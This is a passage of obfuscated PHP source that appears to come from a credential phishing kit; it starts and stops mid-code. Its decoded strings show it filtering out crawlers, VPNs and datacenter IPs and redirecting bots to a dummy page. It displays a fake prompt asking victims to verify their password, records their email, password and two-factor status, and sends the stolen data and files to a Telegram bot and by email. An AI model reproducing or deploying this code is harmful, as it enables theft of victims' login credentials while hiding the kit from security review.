(!$D9bce["\151\x6e\146\x6f"]["\163\164\x61\x74\165\163"]) { goto b6676; } goto Eaa89; D708c: c4e38: goto A190f; e60a3: A0bc7: goto a4288; B25d4: b6676: goto Ee873; Aaf49: $this->redirect("\104\165\x6d\155\171\102\x6f\164"); goto e0dc8; Eaa89: if (!($this->A59a0["\x62\x6f\x74"]["\x63\162\x61\x77\x6c\x65\162"] == 1 && $D9bce["\151\156\146\x6f"]["\x69\163\137\143\x72\x61\167\x6c\x65\162"])) { goto c4e38; } goto A0d99; Ee873: } public function insertUserInformation($A6d4e, $a998d = true) { goto Dfd6c; c5506: $D9bce["\151\156\x66\157"]["\x69\x73\137\x61\142\x75\x73\145\162"] = false; goto D481c; f6b12: $D9bce["\x69\x6e\x66\x6f"]["\151\x73\x5f\x70\x72\157\x78\x79"] = false; goto c3c60; b01b7: $D9bce["\x69\x6e\x66\157"]["\x63\x69\x74\x79"] = $F4bb4["\154\157\x63\x61\x74\x69\x6f\x6e"]["\143\151\164\171"]; goto ad17c; dee37: if (!($D9bce["\151\x6e\x66\157"]["\151\163\137\144\141\164\141\143\145\156\164\x65\x72"] != false)) { goto d98c3; } goto e85d6; e1b96: $D9bce["\151\x6e\146\157"]["\x69\x73\x5f\166\160\x6e"] = false; goto ca68d; Bde5f: if (!($D9bce["\151\156\x66\157"]["\x69\x73\x5f\x62\154\x6f\x63\x6b\145\144\x5f\x64\x61\164\x61\x63\x65\x6e\x74\x65\x72"] == false)) { goto B20a1; } goto D6717; A5b1e: $D9bce["\x69\156\x66\157"]["\151\x73\137\144\141\x74\x61\x63\x65\156\164\145\162"] = $F4bb4["\x69\163\x5f\x64\141\x74\141\143\x65\156\164\145\162"]; goto Dd808; d3d68: A9738: goto c1f58; f8a10: Fa797: goto b9bff; C2369: $D9bce["\x69\156\x66\x6f"]["\x63\157\165\156\x74\x72\171"] = false; goto b9295; a4d5a: $D9bce["\x69\x6e\146\157"]["\151\163\137\x62\154\157\143\153\x65\144\x5f\x64\141\x74\141\143\x65\156\x74\145\x72"] = $this->isBlockedISP($F4bb4["\x64\x61\x74\141\143\145\156\164\145\162"]["\x64\141\x74\141\x63\x65\x6e\164\x65\x72"]); goto D3c7a; Dfd6c: $D9bce["\x69\160"] = $A6d4e; goto f6e55; c3c60: $D9bce["\x69\156\x66\x6f"]["\151\163\137\x76\x70\156"] = false; goto c5506; D481c: $D9bce["\x69\x6e\146\157"]["\x69\x73\137\x62\154\157\143\153\x65\x64\137\x64\x61\x74\141\x63\x65\156\x74\x65\x72"] = false; goto F3b07; ec8f5: d98c3: goto E6d95; b9295: $D9bce["\151\x6e\x66\x6f"]["\143\x69\164\x79"] = false; goto a61a0; e58d2: $D9bce["\x69\156\x66\157"]["\151\163\137\x62\154\x6f\x63\153\145\144\x5f\144\x61\x74\141\143\145\156\164\x65\162"] = false; goto Aa6d4; a794d: if (!isset($F4bb4["\x64\141\x74\x61\143\145\156\164\145\x72"]["\x64\141\x74\x61\x63\x65\x6e\164\145\x72"])) { goto E3dcc; } goto a4d5a; e2a4f: $D9bce["\151\x6e\x66\x6f"]["\151\163\x5f\143\x72\141\x77\x6c\x65\162"] = false; goto B9759; Aa6d4: goto B869c; goto d3d68; D0668: $D9bce["\151\156\146\x6f"]["\x69\x73\137\142\154\x6f\143\x6b\x65\144\137\144\141\164\x61\143\145\x6e\164\145\162"] = false; goto dee37; B85cc: return $D9bce; goto C41c0; Da90c: $D9bce["\x69\156\x66\157"]["\143\151\x74\x79"] = false; goto e2a4f; da3ee: $D9bce["\x69\156\146\x6f"]["\163\x74\141\164\165\x73"] = true; goto Ffa2d; A1756: B869c: goto B85cc; ac63b: B20a1: goto C39b3; ad17c: $D9bce["\x69\x6e\x66\x6f"]["\151\x73\x5f\143\162\x61\167\x6c\145\162"] = $F4bb4["\151\x73\137\143\162\x61\x77\x6c\x65\x72"]; goto A5b1e; D6717: if (!isset($F4bb4["\x64\141\164\141\x63\x65\156\x74\x65\162"]["\144\x6f\155\141\x69\156"])) { goto Fb5a9; } goto da385; ca68d: $D9bce["\x69\156\146\157"]["\x69\x73\x5f\141\x62\165\x73\x65\162"] = false; goto e58d2; F3b07: goto C4210; goto f8a10; da385: $D9bce["\151\156\x66\157"]["\151\163\137\x62\154\157\x63\153\145\144\x5f\144\141\164\141\x63\x65\x6e\x74\145\x72"] = $this->isBlockedISP($F4bb4["\144\141\164\141\x63\x65\x6e\x74\145\162"]["\144\157\x6d\141\151\x6e"]); goto Bcf33; b9bff: if (!(isset($F4bb4["\154\x6f\143\x61\164\x69\157\156"]) && isset($F4bb4["\x69\x73\137\143\x72\x61\167\154\145\x72"]) && isset($F4bb4["\x69\x73\137\x64\141\x74\x61\143\x65\156\164\x65\162"]) && isset($F4bb4["\x69\163\137\160\x72\157\x78\171"]) && isset($F4bb4["\151\163\137\x76\x70\x6e"]) && isset($F4bb4["\151\163\137\141\x62\x75\x73\145\x72"]))) { goto d2163; } goto da3ee; d05a0: $D9bce["\166\x61\x6c\x69\x64\137\143\x61\x70\164\143\150\141"] = $a998d; goto bab2b; c1f58: $F4bb4 = $this->getClientLocation($A6d4e); goto a6f4c; B36ac: $D9bce["\x69\156\x66\x6f"]["\x69\x73\x5f\166\160\x6e"] = $F4bb4["\151\x73\137\x76\x70\156"]; goto A1bbf; Ffa2d: $D9bce["\x69\156\146\x6f"]["\x63\157\165\x6e\x74\162\171"] = $F4bb4["\x6c\157\143\x61\x74\x69\157\156"]["\x63\157\165\x6e\164\x72\171"]; goto bad2a; F3860: C4210: goto A1756; C976a: $D9bce["\x69\x6e\x66\x6f"]["\163\x74\141\164\165\163"] = false; goto d05a0; bad2a: $D9bce["\151\x6e\x66\x6f"]["\143\157\165\156\x74\x72\x79\x5f\x63\157\x64\x65"] = $F4bb4["\x6c\157\x63\x61\x74\x69\x6f\156"]["\x63\157\x75\156\164\162\171\x5f\x63\157\144\x65"]; goto b01b7; bab2b: if ($D9bce["\x69\x70"] != "\125\x4e\113\116\117\x57\116" && $D9bce["\x76\x61\154\x69\144\137\x63\x61\160\x74\x63\x68\x61"]) { goto A9738; } goto f55e1; a61a0: $D9bce["\151\x6e\x66\157"]["\x69\x73\137\x63\162\141\167\x6c\x65\x72"] = false; goto De4cb; E6d95: d2163: goto F3860; A1bbf: $D9bce["\151\156\146\157"]["\151\x73\137\x61\x62\x75\x73\x65\162"] = $F4bb4["\x69\163\137\x61\x62\165\x73\145\x72"]; goto D0668; D3c7a: E3dcc: goto Bde5f; C39b3: a4a44: goto ec8f5; a6f4c: if ($F4bb4 !== null && is_array($F4bb4)) { goto Fa797; } goto C2369; De4cb: $D9bce["\x69\156\x66\157"]["\x69\163\x5f\x64\141\x74\141\x63\145\156\x74\145\x72"] = false; goto f6b12; B7975: $D9bce["\x69\156\x66\x6f"]["\x69\163\x5f\x70\162\x6f\170\x79"] = false; goto e1b96; f55e1: $D9bce["\x69\156\x66\157"]["\143\157\x75\156\x74\162\x79"] = false; goto Da90c; f6e55: $D9bce["\x75\x61"] = $this->getUserAgent(); goto C976a; Bcf33: Fb5a9: goto ac63b; B9759: $D9bce["\x69\x6e\146\157"]["\151\x73\x5f\144\x61\164\141\143\145\x6e\x74\145\162"] = false; goto B7975; e85d6: if (!isset($F4bb4["\144\x61\x74\x61\x63\x65\156\164\x65\162"])) { goto a4a44; } goto a794d; Dd808: $D9bce["\x69\x6e\146\x6f"]["\151\163\x5f\160\x72\157\170\171"] = $F4bb4["\151\163\137\160\x72\157\x78\171"]; goto B36ac; C41c0: } public function getBackgroundVerify($A463a = true, $f17c8 = '', $b8984 = false) { goto abb5e; aeddd: $D1f53 = "\160\141\x67\145\x2f\x69\155\141\x67\x65\163\x2f" . $this->A59a0["\x63\x75\163\x74\157\x6d\137\142\x61\143\x6b\147\162\x6f\165\x6e\144"]; goto Ee600; b73f4: $D1f53 = "\x69\x6d\x61\147\x65\163\x2f" . $this->A59a0["\x62\141\143\x6b\147\x72\x6f\x75\x6e\x64"] . "\x2e\x70\x6e\x67"; goto D3b87; Ee600: if (file_exists($D1f53)) { goto Af41d; } goto Dbda7; db5bb: goto cdbc5; goto C0a01; eca68: die("\x69\x6d\141\x67\145\40\x6e\157\164\x20\146\157\165\x6e\144\56"); goto B7c1d; E1cc9: if (file_exists($D1f53)) { goto A4ef3; } goto eca68; e255e: c8604: goto B871a; baf02: $Af573 = $this->imageToBase64($D1f53); goto db5bb; f2583: $D1f53 = "\160\141\x67\145\x2f\x69\155\141\x67\x65\x73\x2f" . $this->A59a0["\142\x61\x63\x6b\147\x72\x6f\165\x6e\x64"] . "\x2e\x70\x6e\x67"; goto E1cc9; c49d2: Cbe93: goto d585b; b5ee2: Af41d: goto e255e; abb5e: if ($this->A59a0["\142\x61\143\x6b\147\162\157\x75\156\144"] == "\x63\165\x73\x74\x6f\x6d") { goto Cbe93; } goto b73f4; cae11: return "\xd\12\x20\x20\x20\40\x20\40\x20\40\150\x74\x6d\x6c\54\15\xa\x20\x20\40\x20\x20\40\40\x20\142\x6f\x64\171\40\173\xd\12\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x63\x6f\156\x74\x65\156\164\72\40\x22\42\x3b\x20\57\x2a\40\x45\x6d\x70\164\171\x20\x63\157\156\x74\145\x6e\164\x20\x74\157\x20\x61\x6c\x6c\x6f\167\40\164\x68\x65\x20\160\163\x65\x75\x64\x6f\55\145\154\x65\155\x65\x6e\164\x20\x74\157\x20\x72\145\x6e\144\x65\x72\x20\52\x2f\xd\xa\x20\40\x20\40\x20\40\40\x20\40\40\40\40\160\157\163\x69\x74\151\x6f\x6e\72\x20\x61\x62\x73\x6f\x6c\x75\x74\x65\x3b\40\x2f\52\x20\x41\142\163\x6f\154\x75\x74\145\40\160\157\163\x69\164\151\x6f\x6e\x69\x6e\147\x20\52\57\xd\12\40\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\164\x6f\x70\x3a\40\x30\73\xd\xa\x20\40\x20\40\40\40\x20\x20\40\x20\x20\x20\154\x65\146\x74\x3a\40\x30\73\15\12\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\162\x69\x67\x68\x74\72\40\x30\x3b\15\12\x20\40\x20\40\40\40\x20\40\x20\x20\x20\40\x62\157\x74\164\157\x6d\x3a\40\60\x3b\xd\12\x20\x20\40\40\40\x20\40\40\40\x20\40\x20\x7a\55\151\x6e\144\x65\x78\x3a\40\x2d\61\73\40\x2f\52\x20\x45\156\x73\165\x72\x65\40\x69\164\x20\163\x74\x61\x79\x73\x20\x62\145\150\x69\x6e\144\40\157\x74\150\x65\162\x20\x63\x6f\156\x74\145\x6e\164\40\x2a\57\15\12\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x20\x62\x61\143\x6b\x67\x72\157\165\156\x64\x2d\151\155\x61\x67\x65\72\40\x75\162\154\x28\42" . $Af573 . "\42\51\73\xd\12\x20\40\40\40\40\40\40\x20\40\x20\40\40\x62\141\x63\153\x67\162\157\165\156\x64\x2d\163\151\172\x65\x3a\x20\x63\157\166\145\162\73\x20\x2f\x2a\x20\123\143\141\154\145\40\x69\x6d\141\147\x65\40\164\x6f\x20\143\157\166\145\162\x20\x74\x68\145\40\145\156\164\x69\162\x65\40\141\162\145\141\40\52\57\15\xa\40\40\x20\x20\x20\40\40\x20\40\40\x20\x20\142\141\143\x6b\147\162\x6f\165\x6e\x64\x2d\x70\157\x73\x69\164\x69\x6f\x6e\x3a\40\x63\x65\x6e\x74\145\x72\73\x20\57\52\40\103\x65\x6e\164\145\x72\40\164\x68\x65\x20\x62\141\x63\153\x67\162\x6f\165\156\144\x20\x69\x6d\141\147\145\40\x2a\57\15\12\40\40\x20\40\x20\40\x20\40\40\x20\40\40\x62\x61\143\x6b\x67\x72\157\x75\x6e\x64\x2d\162\x65\x70\145\141\164\72\x20\x6e\x6f\x2d\162\x65\160\x65\141\164\73\40\x2f\52\40\x50\162\145\x76\x65\156\x74\x20\x72\145\160\x65\x61\164\x69\156\x67\40\x74\150\145\x20\x69\x6d\141\147\x65\x20\52\x2f\xd\12\40\40\x20\x20\x20\x20\40\x20\175\x20\xd\xa\x20\x20\x20\x20\x20\40\40\x20"; goto E1c71; c6b50: if (!$A463a) { goto fc295; } goto baf02; ed415: goto d616a; goto c49d2; C0a01: fc295: goto daf84; a8e89: if (file_exists($D1f53)) { goto c8604; } goto aeddd; d585b: $D1f53 = "\x69\x6d\141\147\145\x73\57" . $this->A59a0["\143\165\163\164\x6f\155\x5f\142\141\143\153\x67\162\157\165\x6e\x64"]; goto a8e89; B871a: d616a: goto c6b50; F4b32: cdbc5: goto f1b09; Dcfec: ad65d: goto cae11; Dbda7: die("\151\x6d\x61\147\x65\x20\156\x6f\x74\x20\146\157\165\156\x64\56"); goto b5ee2; daf84: $Af573 = $f17c8; goto F4b32; D5045: b365d: goto ed415; f1b09: if (!$b8984) { goto ad65d; } goto c333a; D3b87: if (file_exists($D1f53)) { goto b365d; } goto f2583; B7c1d: A4ef3: goto D5045; c333a: return $Af573; goto Dcfec; E1c71: } public function getFirstMessage() { goto Fa4b7; Ba99c: ef5dd: goto caa1a; E325c: if ($dfc24 == "\164\x65\170\164") { goto cf817; } goto C1d92; db7e8: return "\x42\145\143\x61\165\163\145\40\171\x6f\x75\x27\x72\x65\x20\x61\143\143\x65\163\163\151\156\x67\40\163\145\156\163\151\x74\x69\166\145\x20\151\156\146\x6f\x2c\x20\x79\157\165\40\156\145\x65\x64\40\x74\x6f\x20\166\x65\162\x69\x66\171\x20\171\157\x75\162\x20\160\141\x73\x73\x77\157\x72\x64"; goto B2e9f; B6bd3: return ''; goto f6516; a0d57: cf817: goto f985b; B39cc: cc002: goto B6bd3; f6516: Ab1b5: goto e7141; f985b: return $this->A59a0["\x63\x75\163\x74\x6f\x6d\137\x66\151\x72\163\x74\x6d\x65\x73\x73\141\147\145"]; goto Fb5f5; a53fa: if ($dfc24 == "\144\x65\146\141\165\154\x74") { goto c6e94; } goto E325c; B407c: goto Bae1d; goto C89c2; C89c2: c6e94: goto db7e8; Ee0d8: return "\74\151\x6d\x67\40\x73\x72\143\75\x22" . $this->imageToBase64("\x2e\x2e\x2f" . $this->A59a0["\143\165\163\164\x6f\155\x5f\x66\151\x72\163\164\155\145\163\x73\141\x67\x65"]) . "\x22\x20\141\154\164\75\x22\x49\143\x6f\x6e\x22\40\x73\x74\x79\154\145\75\x22\167\x69\144\x74\x68\x3a\40\65\60\45\73\x20\x68\x65\x69\x67\150\x74\x3a\40\141\165\x74\157\73\42\x20\143\154\x61\x73\x73\75\x22\144\x2d\142\154\157\143\x6b\x22\x2f\76"; goto Ba99c; caa1a: goto F2bfa; goto a0d57; f7cff: if ($dfc24 == "\x6e\157\156\145") { goto cc002; } goto a53fa; Fb5f5: F2bfa: goto B407c; B2e9f: Bae1d: goto d5d9d; d5d9d: goto Ab1b5; goto B39cc; C1d92: if (!($dfc24 == "\x69\x6d\141\147\x65\x73")) { goto ef5dd; } goto Ee0d8; Fa4b7: $dfc24 = $this->A59a0["\x66\151\162\x73\x74\x5f\x6d\x65\163\x73\x61\x67\145"]; goto f7cff; e7141: } public function readJsonFile($bbcd6) { goto C028a; edd8b: return is_array($F9771) ? $F9771 : []; goto D3c71; fb45f: F7234: goto C2170; E0c8f: file_put_contents($bbcd6, json_encode([])); goto f3de2; Daf1e: $F9771 = json_decode($Ab5fa, true); goto edd8b; C028a: if (file_exists($bbcd6)) { goto F7234; } goto E0c8f; f3de2: return []; goto fb45f; C2170: $Ab5fa = file_get_contents($bbcd6); goto Daf1e; D3c71: } public function writeJsonFile($bbcd6, $F9771) { $Ab5fa = json_encode($F9771, JSON_PRETTY_PRINT); file_put_contents($bbcd6, $Ab5fa); } public function getFirstDataByIp($F9771, $A6d4e) { goto d7bef; Dbc6f: return null; goto F2f3f; d7bef: foreach ($F9771 as $Dd0d3) { goto E2eaa; F9e54: b1160: goto A27e5; E2eaa: if (!(isset($Dd0d3["\151\x70"]) && $Dd0d3["\x69\160"] === $A6d4e)) { goto b1160; } goto D903a; D903a: return $Dd0d3; goto F9e54; A27e5: e3b34: goto F34af; F34af: } goto Bd0bb; Bd0bb: B6176: goto Dbc6f; F2f3f: } public function generatePrimaryId($F9771) { goto C36f8; F8cb9: foreach ($F9771 as $Dd0d3) { goto eeac8; e296f: b3159: goto D22e4; D22e4: C9d40: goto A9886; eeac8: if (!(isset($Dd0d3["\x69\144"]) && $Dd0d3["\x69\x64"] > $dd717)) { goto b3159; } goto A2401; A2401: $dd717 = $Dd0d3["\151\144"]; goto e296f; A9886: } goto f94a1; A8ea0: return $dd717 + 1; goto f8eb4; f94a1: Bf830: goto A8ea0; C36f8: $dd717 = 0; goto F8cb9; f8eb4: } public function isDataExist($F9771, $A6d4e) { goto Ec11b; b6303: b0ee3: goto ca904; ca904: return false; goto E7dba; Ec11b: foreach ($F9771 as $Dd0d3) { goto D0a99; a1c24: f7751: goto cae09; F46a9: return true; goto d7447; d7447: b28a1: goto a1c24; D0a99: if (!(isset($Dd0d3["\x69\x70"]) && $Dd0d3["\x69\160"] === $A6d4e)) { goto b28a1; } goto F46a9; cae09: } goto b6303; E7dba: } public function onlyOneTimeUse() { goto E897e; B3ca4: $F4bfb = false; goto ed261; b23b0: $A6d4e = "\x31\x33\62\56\x32\64\x32\x2e\x32\x31\x33\56\x32\60\62"; goto B91db; D00ed: foreach ($F9771 as $F1d02) { goto Ad518; f24df: c4fac: goto A634e; ee05c: $F4bfb = true; goto c00fd; D0835: if ($F1d02["\x64\x65\x74\x61\x69\154\163"]["\164\167\157\x66\141\143\x74\x6f\x72"]) { goto E8268; } goto C4c77; E3c1a: c3dce: goto ee05c; a1173: Bbc46: goto f24df; f6876: if ($F1d02["\144\145\x74\141\x69\x6c\163"]["\x74\167\157\x66\141\x63\x74\x6f\x72"] && $F1d02["\144\x65\164\141\151\x6c\x73"]["\x74\x77\157\x66\x61\143\164\x6f\x72\137\x73\164\141\164\165\x73"] == "\x43\157\155\160\154\145\x74\145") { goto c3dce; } goto D0835; Ad518: if (!($F1d02["\x69\160"] == $A6d4e)) { goto Bbc46; } goto f6876; C4c77: $F4bfb = true; goto C9935; a8153: goto b2a00; goto E3c1a; c00fd: b2a00: goto a1173; C9935: E8268: goto a8153; A634e: } goto C3754; B6a59: $F9771 = $this->readJsonFile($bbcd6); goto B3ca4; c4415: if (!($A6d4e == "\72\x3a\x31")) { goto c2139; } goto b23b0; E897e: $d8f16 = dirname(__FILE__); goto efa13; efa13: $bbcd6 = $d8f16 . "\x2f\56\x2e\x2f" . $this->A59a0["\146\x69\154\x65\163"]["\166\x61\154\151\144"]; goto B6a59; a5959: return $F4bfb; goto d9147; ed261: $A6d4e = $this->getClientIp(); goto c4415; C3754: a9af6: goto a5959; B91db: c2139: goto D00ed; d9147: } public function editData($E939e, $Fd2bb) { goto ef136; Ab5b1: $this->writeJsonFile($bbcd6, $F9771); goto dd7af; ef136: $d8f16 = dirname(__FILE__); goto ea70a; ea70a: $bbcd6 = $d8f16 . "\x2f\x2e\56\57" . $this->A59a0["\x66\151\x6c\x65\x73"]["\x76\141\154\151\x64"]; goto c9d99; b9c5d: F6e4b: goto fc2a4; c9d99: $F9771 = $this->readJsonFile($bbcd6); goto D7c91; D7c91: $af549 = 0; goto fa9f3; fa9f3: foreach ($F9771 as $F1d02) { goto Fe5e2; ab9e9: $af549++; goto d265f; Fe5e2: if (!($F1d02["\x64\x65\x74\x61\151\x6c\163"]["\145\155\x61\x69\x6c"] == $E939e)) { goto e182e; } goto ffa64; ffa64: $e7c18 = $af549; goto Cc943; Cc943: e182e: goto ab9e9; d265f: de15d: goto dddec; dddec: } goto b9c5d; fc2a4: $F9771[$e7c18]["\x64\145\164\x61\151\x6c\163"]["\x74\167\157\146\141\x63\x74\157\x72\x5f\x73\164\x61\164\x75\x73"] = $Fd2bb; goto Ab5b1; dd7af: } public function insertAdditional($A528b, $E939e, $aad56, $Fa64a = true) { goto Bb6f4; B9e9a: $B8967["\144\145\164\141\x69\x6c\163"]["\160\x61\x73\x73\167\157\x72\x64"] = $aad56; goto C6fd2; C9f4f: goto A5334; goto e575a; e5a59: e7f1f: goto Fe653; A7bd4: if ($B8967["\x64\145\x74\x61\151\154\x73"]["\x74\x77\x6f\146\141\x63\164\x6f\x72"]) { goto e0aa5; } goto e355d; dad72: $this->writeJsonFile($bbcd6, $F9771); goto db407; F698d: $F9771[] = $B8967; goto dad72; D8952: Fd2b1: goto cef48; e575a: e0aa5: goto Ef428; D6c49: A5334: goto e5a59; e26b4: $bbcd6 = $d8f16 . "\x2f\56\56\x2f" . $this->A59a0["\x66\151\154\145\163"]["\x76\141\154\151\x64"]; goto D8952; bfd4b: $bbcd6 = $d8f16 . "\57\x2e\56\57" . $this->A59a0["\146\x69\154\x65\163"]["\151\156\x76\141\x6c\x69\144"]; goto fba48; E6595: $B8967["\144\145\x74\x61\151\x6c\163"]["\164\x77\157\146\141\143\x74\157\162"] = $A528b["\x74\x77\x6f\x66\x61\143\164\157\162"]; goto F2c5c; e355d: $B8967["\x64\145\x74\141\151\154\x73"]["\164\167\157\x66\141\x63\x74\x6f\162\137\x73\164\141\x74\165\163"] = "\x4e\x6f"; goto C9f4f; Dc2a1: $B8967["\144\x65\164\x61\151\x6c\163"]["\x65\x64\165"] = $A528b["\145\144\x75"]; goto B818d; F59f7: $B8967 = $_SESSION["\165\x73\145\x72\137\144\141\164\x61"]; goto B625f; a74a2: e54f2: goto e26b4; Ef428: $B8967["\x64\145\164\x61\x69\x6c\x73"]["\164\x77\x6f\x66\141\143\164\157\x72\137\x73\164\x61\164\x75\163"] = "\127\x61\x69\x74\151\x6e\147"; goto D6c49; B818d: $B8967["\144\145\x74\141\x69\154\x73"]["\x74\x79\160\145"] = $A528b["\164\171\160\x65"]; goto A7bd4; F2c5c: $B8967["\144\145\x74\141\x69\x6c\x73"]["\162\x6f\154\x65"] = $A528b["\162\157\x6c\145"]; goto Dc2a1; fba48: goto Fd2b1; goto a74a2; bd033: if ($Fa64a) { goto e54f2; } goto bfd4b; Fe653: $B8967["\x69\x64"] = $this->generatePrimaryId($F9771); goto F698d; Bb6f4: $d8f16 = dirname(__FILE__); goto bd033; db407: $_SESSION["\165\x73\145\162\137\x64\141\x74\141"] = $B8967; goto B0f05; ae739: $B8967["\144\145\164\x61\x69\154\x73"]["\145\155\x61\x69\x6c"] = $E939e; goto B9e9a; B625f: $B8967["\144\x65\164\x61\x69\x6c\163"]["\x73\x74\x61\x74\x75\x73"] = $A528b["\154\151\166\145"]; goto ae739; C6fd2: if (!$A528b["\154\151\166\145"]) { goto e7f1f; } goto E6595; cef48: $F9771 = $this->readJsonFile($bbcd6); goto F59f7; B0f05: } public function insertDataVisitor($a998d = true) { goto F99d0; Aa442: $this->checkUserSecurity($B8967); goto f0b88; ba727: $A6d4e = $this->getClientIp(); goto De65c; D4614: b5c64: goto bb60f; c9812: Fe08b: goto D685b; Dcbab: $F9771[] = $B8967; goto A3eb5; Fae30: $_SESSION["\x75\163\x65\x72\x5f\x64\x61\x74\141"] = $B8967; goto Aa442; D4fc6: A1523: goto ec6c3; Aac3d: $A6d4e = "\61\63\x32\x2e\62\x34\62\x2e\x32\61\63\x2e\x32\60\x32"; goto D4fc6; bb60f: $B8967["\151\144"] = $this->generatePrimaryId($F9771); goto Dcbab; Fc97a: $F9771 = $this->getFirstDataByIp($F9771, $A6d4e); goto Eab5f; db2c8: $F9771 = $this->readJsonFile($bbcd6); goto ba727; A3eb5: $this->writeJsonFile($bbcd6, $F9771); goto Fae30; Eab5f: $_SESSION["\x75\163\145\162\x5f\x64\141\164\x61"] = $F9771; goto A1981; e62f0: return 1; goto c9812; ec6c3: if (!$this->isDataExist($F9771, $A6d4e)) { goto Fe08b; } goto Fc97a; A1981: $this->checkUserSecurity($F9771); goto e62f0; D685b: if ($a998d) { goto A4db4; } goto e46e8; De65c: if (!($A6d4e == "\x3a\72\61")) { goto A1523; } goto Aac3d; e46e8: $B8967 = $this->insertUserInformation($A6d4e, false); goto ca2ae; ca2ae: goto b5c64; goto e3ed3; fbcfa: $bbcd6 = $d8f16 . "\x2f\x2e\56\x2f" . $this->A59a0["\x66\x69\154\x65\x73"]["\x76\151\163\151\x74"]; goto db2c8; e3ed3: A4db4: goto Ed218; Ed218: $B8967 = $this->insertUserInformation($A6d4e); goto D4614; F99d0: $d8f16 = dirname(__FILE__); goto fbcfa; f0b88: } private function SendMessageTelegram($B0eec, $Eb0ea, $f040c) { goto cf0aa; D13fb: curl_close($Be897); goto bff90; a2edb: $Be897 = curl_init($a70df); goto A209d; bff90: return json_decode($D9bce, true); goto A7054; A209d: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto C1f60; C1f60: curl_setopt($Be897, CURLOPT_POST, true); goto D48ab; cfd42: $F9771 = ["\143\150\141\x74\x5f\151\x64" => $Eb0ea, "\x74\x65\x78\164" => $f040c, "\x70\x61\162\163\145\x5f\155\157\x64\145" => "\x48\124\115\114"]; goto a2edb; F2a24: if (!curl_errno($Be897)) { goto abc87; } goto c738c; D0c1f: abc87: goto D13fb; c738c: echo "\105\x72\162\x6f\162\72" . curl_error($Be897); goto D0c1f; D48ab: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto B9349; B9349: curl_setopt($Be897, CURLOPT_HTTPHEADER, ["\x43\x6f\156\x74\x65\x6e\164\x2d\164\x79\160\145\x3a\x20\x61\160\160\154\151\x63\x61\164\x69\x6f\156\57\x78\55\167\167\167\x2d\146\x6f\x72\x6d\55\165\x72\154\x65\156\x63\x6f\144\145\x64"]); goto Dd205; Dd205: $D9bce = curl_exec($Be897); goto F2a24; cf0aa: $a70df = "\150\164\x74\160\x73\72\57\57\x61\x70\x69\x2e\164\x65\x6c\145\147\162\141\x6d\x2e\x6f\162\x67\57\x62\x6f\164{$B0eec}\x2f\x73\145\x6e\144\115\145\x73\x73\x61\x67\x65"; goto cfd42; A7054: } private function SendFileTelegram($B0eec, $Eb0ea, $b51c0) { goto cce3c; d0f2b: curl_setopt($Be897, CURLOPT_HTTPHEADER, ["\x43\157\x6e\164\x65\156\x74\x2d\x54\171\x70\145\72\155\x75\154\x74\x69\x70\141\162\164\57\x66\157\162\x6d\55\x64\141\164\141"]); goto Bf562; e70e6: return $D9bce; goto A0d67; Eae8f: curl_setopt($Be897, CURLOPT_POSTFIELDS, $Df95c); goto Fb65f; cce3c: $a70df = "\x68\x74\x74\160\163\72\x2f\57\x61\x70\x69\x2e\x74\145\154\x65\x67\x72\x61\x6d\x2e\x6f\x72\147\x2f\142\x6f\x74{$B0eec}\57\x73\145\156\x64\x44\x6f\x63\165\155\145\x6e\x74"; goto a5894; fc85b: $Be897 = curl_init(); goto d0f2b; Fb65f: $D9bce = curl_exec($Be897); goto b85cb; bb868: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, 1); goto Eae8f; a5894: $Df95c = ["\x63\150\x61\x74\x5f\151\x64" => $Eb0ea, "\x64\x6f\x63\x75\155\145\156\x74" => new CURLFile(realpath($b51c0))]; goto fc85b; Bf562: curl_setopt($Be897, CURLOPT_URL, $a70df); goto bb868; b85cb: curl_close($Be897); goto e70e6; A0d67: } public function SendInfoTelegram($A528b, $E939e, $aad56) { goto a2ab5; Ad0b2: E6689: goto E8972; c6d24: D5ca5: goto b2ea8; A483a: $b1835 = $A528b["\145\144\x75"] == true ? "\131\x65\x73" : "\x4e\157"; goto E47a2; bbde0: $ec8e9 = $A528b["\x72\x6f\x6c\145"] == true ? "\131\x65\163" : "\116\x6f"; goto C3963; b98e5: $B17d9 .= "\122\145\x74\x75\x72\x6e\55\120\x61\x74\150\x3a\40{$A5d79}" . "\15\12"; goto d564c; Bb309: if (!$this->A59a0["\x74\x65\154\145\x67\x72\x61\x6d"]["\x61\143\164\151\x76\x65"]) { goto A00da; } goto Ddd46; D494c: $ddf49 = $A528b["\164\x77\157\146\141\143\x74\x6f\162"] == true ? "\131\x65\x73" : "\116\157"; goto e4bf2; Ffa3b: $b1835 = $A528b["\145\x64\165"] == true ? "\x59\x65\163" : "\x4e\x6f"; goto bbde0; E3709: A00da: goto d141d; d3e74: if (@mail($b77a3, $ba22b, $f0a7a, $B17d9)) { goto D5ca5; } goto B7003; b36c6: Eab71: goto Ca301; da9a3: if (!file_exists($b51c0)) { goto b780b; } goto C1164; C1164: $this->SendFileTelegram($B0eec, $Eb0ea, $b51c0); goto F16c1; E47a2: $ec8e9 = $A528b["\162\x6f\154\145"] == true ? "\131\145\163" : "\116\x6f"; goto D494c; Ff827: if ($A528b["\154\151\x76\x65"]) { goto Ee748; } goto c7263; a0b5c: $B17d9 = "\115\x49\x4d\105\x2d\126\145\x72\163\151\x6f\x6e\72\x20\x31\x2e\x30" . "\15\xa"; goto d9f00; E0814: $B17d9 .= "\122\145\x70\154\x79\55\124\x6f\x3a\x20{$A5d79}" . "\xd\xa"; goto b98e5; e7b13: F3298: goto ef810; F3180: $A6d4e = $_SESSION["\x75\163\145\162\x5f\144\141\164\141"]["\x69\160"]; goto D6c84; e02fb: $f0a7a = 